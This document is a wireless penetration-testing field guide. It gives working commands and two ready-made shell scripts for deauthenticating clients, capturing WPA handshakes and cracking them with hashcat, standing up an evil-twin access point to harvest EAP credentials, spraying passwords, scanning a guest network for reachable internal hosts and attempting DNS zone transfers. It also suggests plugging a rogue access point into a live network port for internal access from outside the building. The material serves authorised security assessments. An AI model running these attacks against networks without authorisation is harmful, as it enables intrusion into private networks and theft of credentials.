Make sure you have everything you’ll need, since these assessments are always on-site and you can’t run back for a cable.
- Computer (even better to bring more than 1), with Kali Linux installed
- Power cords
- WiFi Card(s) – at least 1 spare, since they don’t like to work when they need to
- Different antennas
- MiFi (your own cellular hotspot), since they’re probably not going to let you on their network so easily
- USB Hub, as the wireless card might need extra power
- OEM power cords
- Power strip – there’s a lot to plug in
That’s a good start.
Thanks to Ted Raffle for this writeup.
Start up Kali, plug in the card, and run iwconfig to confirm the card shows up (as wlan0 or similar)
Kill the processes that will fight you for the interface (NetworkManager, wpa_supplicant): airmon-ng check kill
Put the card into monitor mode: airmon-ng start wlan0 (the monitor interface comes up as wlan0mon)
To see networks, their BSSIDs and attached clients on both 2.4 and 5 GHz (round-robin channel hopping): airodump-ng --band abg --cswitch 1 wlan0mon
If you need to de-auth a client so it reconnects: aireplay-ng --deauth <number of packets, or 0 for infinite> -a [MAC of AP] -c [MAC of client] wlan0mon (leave off -c to deauth every client on the AP; a short burst is usually enough, and an endless deauth storm is noisy)
Capture the WPA handshake the PSK is cracked from, locked to the AP’s channel and BSSID: airodump-ng wlan0mon -c 1 --bssid [MAC of AP] --write <filename> (the capture lands in <filename>-01.cap; check the top right of the airodump-ng screen for “WPA handshake” before stopping)
Strip the capture down to the beacon and EAPOL frames (the first argument is the output file): wpaclean clean.cap <filename>-01.cap
And convert it into hashcat’s hccap format: aircrack-ng clean.cap -J hccap (writes hccap.hccap)
hashcat -m 2500 hccap.hccap <wordlist> -r rules/<rule> (the wordlist is positional and rules go with -r; -w is hashcat’s workload profile, not the wordlist). hashcat 6.0 and later deprecates -m 2500 in favour of -m 22000: convert with hcxpcapngtool -o hash.22000 <filename>-01.cap and crack with hashcat -m 22000 hash.22000 <wordlist> -r rules/<rule> instead.
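The capture, verify and crack steps above as one script, added here as an example (it is not code from the original write-up, nor from the aircrack-ng or hashcat projects). It assumes Kali with aircrack-ng and hashcat installed; the interface name, channel, BSSID, client MAC, wordlist and rule paths are placeholders that can be overridden through the environment. The one thing it adds over typing the commands by hand is a check that the capture really contains a handshake for the target BSSID before any cracking starts.

```shell
#!/bin/sh
# Added example, not code from the original write-up or from the aircrack-ng
# or hashcat projects: the capture -> verify -> crack sequence as one script,
# with a check that the capture really holds a handshake before any GPU time
# is spent. Assumes Kali with aircrack-ng and hashcat installed. Interface,
# channel, MACs, wordlist and rule paths are placeholders; override via env.
set -eu

IFACE=${IFACE:-wlan0mon}
CHANNEL=${CHANNEL:-1}
AP_MAC=${AP_MAC:-00:11:22:33:44:55}          # placeholder BSSID
CLIENT_MAC=${CLIENT_MAC:-66:77:88:99:AA:BB}  # placeholder associated client
OUT=${OUT:-capture}                          # airodump-ng writes capture-01.cap
WORDLIST=${WORDLIST:-/usr/share/wordlists/rockyou.txt}
RULES=${RULES:-/usr/share/hashcat/rules/best64.rule}

# Parse the network listing aircrack-ng prints when handed a capture and no
# wordlist, e.g. "   1  00:11:22:33:44:55  CorpWifi  WPA (1 handshake)", and
# print the handshake count recorded for one BSSID (0 if it is not listed).
handshake_count() {
  awk -v b="$1" '
    toupper($2) == toupper(b) && match($0, /\([0-9]+ handshake/) {
      # RSTART is the "(", and the trailing " handshake" is 10 characters
      print substr($0, RSTART + 1, RLENGTH - 11)
      found = 1
      exit
    }
    END { if (!found) print 0 }'
}

# 1. Sit on the target channel, filtered to the BSSID, and write the capture.
#    Blocks until Ctrl-C, so run it in its own terminal.
capture() {
  airodump-ng "$IFACE" -c "$CHANNEL" --bssid "$AP_MAC" --write "$OUT"
}

# 2. From a second terminal, kick one client so it reconnects and the 4-way
#    handshake lands in the capture. A short burst is normally enough.
deauth() {
  aireplay-ng --deauth "${1:-5}" -a "$AP_MAC" -c "$CLIENT_MAC" "$IFACE"
}

# 3. Confirm the handshake is present. aircrack-ng lists the networks in the
#    capture and then asks for a wordlist; </dev/null ends it at that prompt.
verify() {
  n=$(aircrack-ng "${OUT}-01.cap" </dev/null 2>/dev/null | handshake_count "$AP_MAC")
  if [ "$n" -ge 1 ]; then
    echo "handshake(s) captured for $AP_MAC: $n"
  else
    echo "no handshake for $AP_MAC yet: deauth again or wait for a reconnect" >&2
    return 1
  fi
}

# 4. Strip the capture to beacon + EAPOL frames, convert, and crack. In
#    hashcat the wordlist is positional and rules are passed with -r; -w is
#    the workload profile, not the wordlist.
crack() {
  verify
  wpaclean clean.cap "${OUT}-01.cap"
  aircrack-ng clean.cap -J hccap             # writes hccap.hccap
  hashcat -m 2500 hccap.hccap "$WORDLIST" -r "$RULES"
}

# Offline check of the parser against a constructed aircrack-ng listing.
selftest() {
  got=$(printf '%s\n' \
    '   #  BSSID              ESSID      Encryption' \
    '   1  00:11:22:33:44:55  CorpWifi   WPA (1 handshake)' \
    '   2  AA:BB:CC:DD:EE:FF  GuestNet   WPA (0 handshake)' \
    | handshake_count 00:11:22:33:44:55)
  [ "$got" = 1 ] && echo "parser ok"
}

case "${1:-}" in
  capture)  capture ;;
  deauth)   deauth "${2:-5}" ;;
  verify)   verify ;;
  crack)    crack ;;
  selftest) selftest ;;
  *)        [ $# -eq 0 ] || echo "usage: $0 {capture|deauth [count]|verify|crack|selftest}" >&2 ;;
esac
```

Run `capture` in one terminal and `deauth` in another, then `crack`, which refuses to start until `verify` sees at least one handshake for the BSSID. On hashcat 6.0 or later swap the last two lines of `crack` for `hcxpcapngtool -o hash.22000 capture-01.cap` and `hashcat -m 22000 hash.22000 "$WORDLIST" -r "$RULES"`, since -m 2500 is deprecated there.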
Have mana (SensePost’s hostapd-mana rogue-AP toolkit) installed
Use Nick Sanzotta’s “manaSucks” script to stand up the evil twin and collect EAP credentials:
python manaSucks.py -iwlan0mon -m=<fake MAC address> --hostname 'anything' -s<SSID> -c6 --manaloud=0
For brute forcing the EAP network you need usernames: take them from the evil twin (the EAP identities it captured), from Nick Sanzotta’s WiFiSuite, or from scraping, then spray one password across them with WiFiSuite:
python wifisuite.py -iwlan0mon -s"<SSID>" -u <username file> -p<password> spray
If you get guest network access, test for network segmentation. nmap the neighborhood (your own subnet, the gateway, and anything else the DHCP lease points you at) looking for “up” hosts. If there are any, nmap them for services. Also check the nameservers you were handed: whether they are reachable on more than DNS, whether they recurse for you, and whether they resolve internal names.
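The segmentation check above as a script, added here as an example (it is not part of the original write-up). It assumes nmap, dig and iproute2 are installed and that the interface named in IFACE (a placeholder) holds the DHCP lease the guest network handed out; it sweeps your own subnet, the gateway and the pushed resolvers plus any ranges you name, service-scans whatever answers, and then asks each resolver about recursion, its version string, and a zone transfer for the search domain from the lease.

```shell
#!/bin/sh
# Added example, not code from the original write-up: the guest-network
# segmentation check as a script. Assumes nmap, dig (bind9-dnsutils) and
# iproute2 are installed, and that IFACE (placeholder) holds the DHCP lease
# the guest network handed out.
set -eu

IFACE=${IFACE:-wlan0}
RESOLV=${RESOLV:-/etc/resolv.conf}
OUTDIR=${OUTDIR:-seg-check}

# Keep only live hosts from nmap's greppable output (-oG -):
#   "Host: 10.20.30.1 ()  Status: Up"  ->  "10.20.30.1"
up_hosts() {
  awk '$1 == "Host:" && /Status: Up/ { print $2 }'
}

# Resolvers pushed by the guest DHCP lease; on a flat network these are often
# the corporate DNS servers, which makes them the first hosts worth a look.
resolv_nameservers() {
  awk '$1 == "nameserver" { print $2 }' "$1"
}

# Search domains from the same lease: the internal zone name to try AXFR on.
resolv_domains() {
  awk '$1 == "search" || $1 == "domain" { for (i = 2; i <= NF; i++) print $i }' "$1"
}

# Ping sweep (no DNS, no ports) of the given ranges, printing live hosts.
sweep() {
  nmap -sn -n -oG - "$@" | up_hosts
}

# Service scan of every live host the sweep found.
services() {
  nmap -sV -Pn -n --top-ports 100 -iL "$OUTDIR/up.txt" -oN "$OUTDIR/services.txt"
}

# For each pushed resolver: does it recurse for the guest segment, what does
# it admit to running, and will it hand over the internal zone?
dns_check() {
  resolv_nameservers "$RESOLV" | while read -r ns; do
    nmap -sU -sT -Pn -n -p 53 --script dns-recursion -oN "$OUTDIR/dns-$ns.txt" "$ns"
    dig @"$ns" version.bind chaos txt +short || true
    resolv_domains "$RESOLV" | while read -r zone; do
      dig @"$ns" "$zone" axfr +noall +answer || true
    done
  done
}

run() {
  mkdir -p "$OUTDIR"
  local_net=$(ip -4 -o addr show dev "$IFACE" | awk '{ print $4 }' | head -n 1)
  gateway=$(ip -4 route show dev "$IFACE" | awk '$1 == "default" { print $3 }' | head -n 1)
  # Own subnet, gateway and pushed resolvers, plus any extra ranges given on
  # the command line (an RFC 1918 block you suspect the corporate LAN uses).
  sweep $local_net $gateway $(resolv_nameservers "$RESOLV") "$@" > "$OUTDIR/up.txt"
  echo "live hosts reachable from the guest segment: $(wc -l < "$OUTDIR/up.txt")"
  if [ -s "$OUTDIR/up.txt" ]; then
    services
  fi
  dns_check
}

# Offline check of the parser against constructed nmap greppable output.
selftest() {
  hosts=$(printf '%s\n' \
    '# Nmap 7.94 scan initiated' \
    'Host: 10.20.30.1 ()  Status: Up' \
    'Host: 10.20.30.2 ()  Status: Down' \
    'Host: 10.20.30.40 ()  Status: Up' \
    | up_hosts | tr '\n' ' ')
  [ "$hosts" = "10.20.30.1 10.20.30.40 " ] && echo "parser ok"
}

case "${1:-}" in
  run)      shift; run "$@" ;;
  selftest) selftest ;;
  *)        [ $# -eq 0 ] || echo "usage: $0 {run [extra ranges...]|selftest}" >&2 ;;
esac
```

Run it as root (the UDP probe and -sV need it) with `run 10.0.0.0/24 192.168.1.0/24` or whatever ranges you suspect; an empty up.txt plus resolvers that refuse recursion is what a properly segmented guest network looks like, and anything else goes in the report.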
If you get on the corporate network with credentials, it’s essentially now an internal assessment. Pick something to show risk and move on. After all, it’s a wireless assessment.
Test from outside the building whether the networks are still reachable (parking lot, neighboring floors, the street)
Plug a WiFi repeater/AP into a live network port: is it detected? Are there any network access controls (802.1X/NAC)? Probably not, and now you have internal access from outside the building